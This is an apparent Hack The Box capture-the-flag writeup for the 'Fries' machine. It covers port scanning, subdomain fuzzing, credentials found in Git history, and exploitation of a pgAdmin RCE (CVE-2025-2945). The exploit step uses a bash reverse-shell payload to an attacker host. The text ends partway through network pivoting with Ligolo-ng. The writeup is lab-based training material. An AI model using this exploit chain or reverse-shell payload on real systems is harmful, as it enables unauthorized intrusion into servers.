Hack The Box - Season 9 HTB Fries Writeup - HARD - Weekly - November 22th, 2025
Fries - HackTheBox Writeup
Machine Information
- Difficulty: Hard
- Operating System: Windows Server 2022 (Domain Controller) + Ubuntu (Web Server)
- Domain: fries.htb
Initial Setup
Hosts Configuration
Add the following entries to /etc/hosts:
echo "$TARGET_IP fries.htb DC01.fries.htb code.fries.htb db-mgmt05.fries.htb" | sudo tee -a /etc/hosts
Reconnaissance
Nmap Scan
Full port scan to identify open services:
sudo nmap -A -sC -sS -v -p- --min-rate=1000 $TARGET_IP -oN nmap_full.txt
Key Findings:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.18.0 (Ubuntu)
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open ssl/ldap
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp open mc-nmf .NET Message Framing
Environment Details:
- Domain:
fries.htb - Domain Controller:
DC01.fries.htb - Certificate Authority:
fries-DC01-CA
Subdomain Enumeration
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
-u http://$TARGET_IP \
-H "Host: FUZZ.fries.htb" \
-mc 200
Discovered Subdomains:
code.fries.htb- Gitea instancedb-mgmt05.fries.htb- pgAdmin interfacehttps://fries.htb- Password Management portal
Web Application Enumeration
Gitea Instance (code.fries.htb)
Accessing http://code.fries.htb reveals a Gitea repository hosting application code.
Key Intelligence from Repository:
- Flask application with PostgreSQL backend
- Database management interface at
db-mgmt05.fries.htb - Database name:
ps_db - Key personnel: Dylan, Mike, Dale (infrastructure access)
- Contact:
d.cooper@fries.htb
Git History Analysis
Searching through Git history reveals sensitive credentials:
git clone http://code.fries.htb/fries/fries-app.git
cd fries-app
git log -p --all | grep -i "postgresql\|postgres\|database_url\|sqlalchemy" -B 5 -A 5
Credentials Found:
DATABASE_URL=postgresql://root:PsqLR00tpaSS11@172.18.0.3:5432/ps_db
SECRET_KEY=[REDACTED]
pgAdmin Interface (db-mgmt05.fries.htb)
The subdomain hosts pgAdmin 9.1, which is vulnerable to CVE-2025-2945 (Remote Code Execution).
Login Credentials (from Gitea repository):
Username: d.cooper@fries.htb
Password: D4LE11maan!!
Exploitation - Initial Access
CVE-2025-2945 - pgAdmin RCE
# Clone exploit
git clone https://github.com/Cycloctane/cve-2025-2945-poc.git
cd cve-2025-2945-poc
#start nc
nc -lvnp 4444
# Execute exploit
python3 exp.py \
--target-url http://db-mgmt05.fries.htb \
--username d.cooper@fries.htb \
--password 'D4LE11maan!!' \
--db-user root \
--db-pass 'PsqLR00tpaSS11' \
--db-name ps_db \
--payload "__import__('os').system('bash -c \"bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1\"')"
Result: Shell as pgadmin user inside Docker container
Post-Exploitation - Docker Container
Network Pivoting with Ligolo-ng
To access the internal Docker network and pivot further:
# Download Ligolo-ng
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
# Extract
tar -xzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
tar -xzf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
# Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
# Start proxy
./proxy -selfcert -laddr 0.0.0.0:11601